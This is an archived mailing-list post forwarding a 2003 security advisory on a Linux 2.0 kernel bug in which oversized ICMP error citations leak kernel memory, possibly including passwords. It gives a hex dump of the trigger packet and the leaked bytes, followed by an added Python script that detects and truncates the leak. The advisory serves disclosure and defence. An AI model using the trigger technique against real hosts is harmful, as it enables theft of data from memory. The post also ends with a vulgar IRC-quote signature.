Message-ID: <3EE4483B.2000309@d2.net.au>
From: andrewg at d2.net.au (Andrew Griffiths)
Subject: Linux 2.0 remote info leak from too big icmp citation
http://www.securityfocus.com/archive/1/251418/2002-01-15/2002-01-21/0
Looks like another way of triggering the bug, IMO.
Philippe Biondi wrote:
> ----------------------------------------------------------------------
> Cartel Sécurité --- Security Advisory
>
> Advisory Number: CARTSA-20030314
> Subject: Linux 2.0 remote info leak from too big icmp citation
> Author: Philippe Biondi <biondi@...tel-securite.fr>
> Discovered: March 14, 2003
> Published: June 9, 2003
> CERT reference: VU#471084 (http://www.kb.cert.org/vuls/id/471084)
> ----------------------------------------------------------------------
>
> You can use this URL to link this document :
> http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt
>
>
> Problem description
> ===================
>
> There is a bug in the way the Linux 2.0 kernel IP stack computes the size of an
> ICMP citation for almost every ICMP error. This leads to too much data being
> sent on the network, coming from anywhere in memory.
>
> This is a very important leak. Experiments show that even passwords can
> be stolen. Moreover, you can do this from anywhere on the internet, as soon
> as you can send IP packets to the vulnerable host (except special firewalling).
>
> The typical case is when you use a Linux 2.0 box (or, more probably,
> any appliance that uses it) as a masquerading gateway for internet and
> DMZ. In this configuration, the gateway can be used to leak potentially
> all your traffic from your LAN, even your POP passwords for
> the mail server in the DMZ.
>
>
> Vulnerable products
> ===================
>
> Any 2.0 Linux kernel before 2.0.39 (2.0.39 included)
> Watchguard Firebox II
>
> Any appliance (firewall, proxy, etc.) that uses Linux 2.0 <= 2.0.39
>
>
> A tester can be found here (no guarantee though) :
> http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py
>
> Vulnerable:
> # ./icmpleaktest.py 192.168.11.2
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'
>
> Not vulnerable:
> # ./icmpleaktest.py 172.16.1.40
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got ''
>
>
> Vendor status
> =============
>
> Linux 2.0.40 should be out soon.
I was under the impression they would have fixed it earlier. That said,
I wouldn't be surprised.
> Watchguard said updated releases will follow.
>
> These vendors said they are not vulnerable :
> * Netscreen
> * Symantec
> * Novell
> * Clavister
> * Ingrian
> * StoneSoft
> * Sun
>
>
> Solutions
> =========
>
> * patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch
> (No guarantee)
> * exchange your old appliance for a brand new Linux 2.4/netfilter one
>
>
> Workarounds
> ===========
>
> No good workarounds. But you can at least carefully try these :
> * truncate ICMP errors at the RFC limit,
> * filter out icmp errors
>
>
> Example
> =======
>
> We can send an IP packet with the MF flag :
>
> 15:41:05 192.168.0.12.80 > 192.168.0.10.80: udp 4 (frag 52007:12@0+)
> 0x0000 4500 0020 cb27 2000 4011 0e3f c0a8 000c E....'..@.......
> 0x0010 c0a8 000a 0050 0050 000c cd1e 5858 5858 .....P.P....XXXX
>
> we wait 30s for the reassembly to timeout :
>
> 15:41:35 192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
> 0x0000 45c0 0050 dcca 0000 4001 1bbc c0a8 000a E..P....@.......
> 0x0010 c0a8 000c 0b01 aa24 0000 0000 4500 0020 .......$....E...
> 0x0020 cb27 2000 4011 0e3f c0a8 000c c0a8 000a .'..@...........
> 0x0030 0050 0050 000c cd1e 5858 5858 0050 0050 .P.P....XXXX.P.P
> 0x0040 000c cd1e 5858 5858 207b 2d68 0000 0000 ....XXXX.{-h....
>
>
> Bytes at offsets 0x3c to 0x4f are bonus.
> It works with every ICMP error except the port unreachable error.
> It is possible to increase the size of data leaked by adding IP options.
>
>
> Examples of bonus bytes :
>
> 98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00 .....X..1234..U.
> 98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00 .........X......
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03 X............X..
> 69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46 information.MINF
> 00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03 ..........U.....
> 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX....
> 2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72 .0.%u.in-addr.ar
> 90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F C_MONETARY.LC_CO
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00 ................
> 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX....
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00 ....._..........
> 73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E sinl..gnu.warnin
> 70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40 p..@`..@...@...@
> 68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00 h...AF..g...AL..
> FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00 ............J...
> 61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F age-return.SI.SO
> 61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F ash.zero.one.two
> 0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00 ................
> 01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00 ....-...........
> 4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00 L.......M.......
> 01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00 ....l.......m...
> 4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47 LC_ALL.LC_MESSAG
>
>
> ----------------------------------------------------------------------
> Copyright (c) Cartel Sécurité
> This document is copyrighted. It can't be edited or republished
> without explicit consent of Cartel Sécurité.
> For more information, feel free to contact us.
> http://www.cartel-securite.fr/
> ----------------------------------------------------------------------
>
Sincerely,
Andrew Griffiths
--
<Kahless> geez, u climb the highest mountain, netstumble the highest
mast, but
you suck one cock........
<Clonefish> No thanks
<Kahless> hey, it wasn't an invitation........
<RokLobsta> or you help luigi build his house, guiseppe to get his business
going and you save the town from a meteor, but you fuck one goat....
<Kahless> that's the one
<Clonefish> Mmmmkay.....
<swarm> um
<swarm> next topic plz
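The advisory's Example section shows the whole bug in one packet: the "ip reassembly time exceeded" reply cites 52 bytes of the offending datagram although that datagram was only 32 bytes long, so bytes 0x3c-0x4f are kernel memory. The script below is an added example, not part of Andrew's reply, the advisory or the Linux 2.0 source. It takes the ICMP reply from the advisory's tcpdump output as its sample input (transcribed here, 80 bytes), parses the outer IP header, the ICMP header and the cited inner IP header, and reports every cited byte that lies past the inner datagram's declared total length. It then applies the "truncate ICMP errors at the RFC limit" workaround the advisory lists: the citation is cut to the RFC 792 size (inner IP header plus 8 bytes) and both checksums are recomputed. Function names, the dictionary layout and the use of the RFC 792 limit for truncation are this example's own choices; the IP header checksum in the sample (0x1bbc) verifies, which the code uses as a sanity check on its own checksum routine.

```python
"""Detect and strip an over-long ICMP error citation (the Linux 2.0 leak class).

Added example; not code from the advisory or from the kernel. SAMPLE_ICMP_REPLY
is transcribed from the advisory's tcpdump hex dump; everything else is ours.
"""
import struct

# RFC 792: an ICMP error cites the offending datagram's IP header plus the
# first 64 bits (8 bytes) of its payload.
RFC792_CITED_PAYLOAD = 8

# ICMP types that carry a citation: dest unreachable, source quench,
# redirect, time exceeded, parameter problem.
ICMP_ERROR_TYPES = {3, 4, 5, 11, 12}

# Sample input: the 80-byte "ip reassembly time exceeded" reply from the
# advisory's Example section (outer IP + ICMP + 52 cited bytes).
SAMPLE_ICMP_REPLY = bytes.fromhex(
    "45c0 0050 dcca 0000 4001 1bbc c0a8 000a "
    "c0a8 000c 0b01 aa24 0000 0000 4500 0020 "
    "cb27 2000 4011 0e3f c0a8 000c c0a8 000a "
    "0050 0050 000c cd1e 5858 5858 0050 0050 "
    "000c cd1e 5858 5858 207b 2d68 0000 0000"
)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; returns 0 when data (with its checksum) verifies."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _ipv4_header_len(pkt: bytes) -> int:
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    return (pkt[0] & 0x0F) * 4


def analyse_icmp_error(pkt: bytes) -> dict:
    """Split an IPv4/ICMP error and report how much citation lies beyond the
    end of the datagram it claims to quote.

    A citation may legitimately be shorter than the original datagram (RFC 792
    / RFC 1812 truncation) but never longer: bytes past the inner total length
    did not come from the offending packet, so on an affected stack they are
    whatever the kernel had in that buffer.
    """
    ihl = _ipv4_header_len(pkt)
    total_len = struct.unpack_from("!H", pkt, 2)[0]
    if pkt[9] != 1:
        raise ValueError("not ICMP")
    pkt = pkt[:total_len]                      # drop link-layer padding, if any
    icmp = pkt[ihl:]
    if len(icmp) < 8 or icmp[0] not in ICMP_ERROR_TYPES:
        raise ValueError("not an ICMP error message")
    cited = icmp[8:]
    inner_ihl = _ipv4_header_len(cited)
    inner_total = struct.unpack_from("!H", cited, 2)[0]
    bonus = cited[inner_total:] if len(cited) > inner_total else b""
    return {
        "icmp_type": icmp[0],
        "icmp_code": icmp[1],
        "original_len": inner_total,           # what the cited datagram says it was
        "cited_len": len(cited),               # what the error actually carries
        "rfc792_len": inner_ihl + RFC792_CITED_PAYLOAD,
        "bonus": bonus,                        # leaked bytes, empty on a sane stack
    }


def truncate_icmp_citation(pkt: bytes) -> bytes:
    """Rewrite the ICMP error with its citation cut to the RFC 792 size and
    the IP and ICMP checksums recomputed: the advisory's first workaround,
    expressed as a packet rewrite a filtering gateway could apply."""
    info = analyse_icmp_error(pkt)
    ihl = _ipv4_header_len(pkt)
    total_len = struct.unpack_from("!H", pkt, 2)[0]
    icmp_hdr = bytearray(pkt[ihl:ihl + 8])
    cited = pkt[ihl + 8:total_len][:min(info["cited_len"], info["rfc792_len"])]
    icmp_hdr[2:4] = b"\x00\x00"                # zero before recomputing
    icmp = bytes(icmp_hdr) + cited
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip_hdr = bytearray(pkt[:ihl])
    struct.pack_into("!H", ip_hdr, 2, ihl + len(icmp))
    ip_hdr[10:12] = b"\x00\x00"
    struct.pack_into("!H", ip_hdr, 10, inet_checksum(bytes(ip_hdr)))
    return bytes(ip_hdr) + icmp


if __name__ == "__main__":
    info = analyse_icmp_error(SAMPLE_ICMP_REPLY)
    print("type %d code %d: original %d bytes, cited %d bytes, %d leaked"
          % (info["icmp_type"], info["icmp_code"], info["original_len"],
             info["cited_len"], len(info["bonus"])))
    print("leaked:", info["bonus"].hex())
    print("truncated to %d bytes" % len(truncate_icmp_citation(SAMPLE_ICMP_REPLY)))
```

Run against the sample it reports 20 leaked bytes starting 0050 0050 000c cd1e, i.e. the tail of the dump from offset 0x3c, and the truncated packet shrinks from 80 to 56 bytes with a citation of exactly 28 bytes. The same parser is what you would run over a capture to confirm a gateway is affected without relying on the advisory's Python tester, and the check is deliberately length-based rather than RFC-792-based: RFC 1812 allows routers to cite more than 8 bytes, so only a citation longer than the original datagram is evidence of a leak.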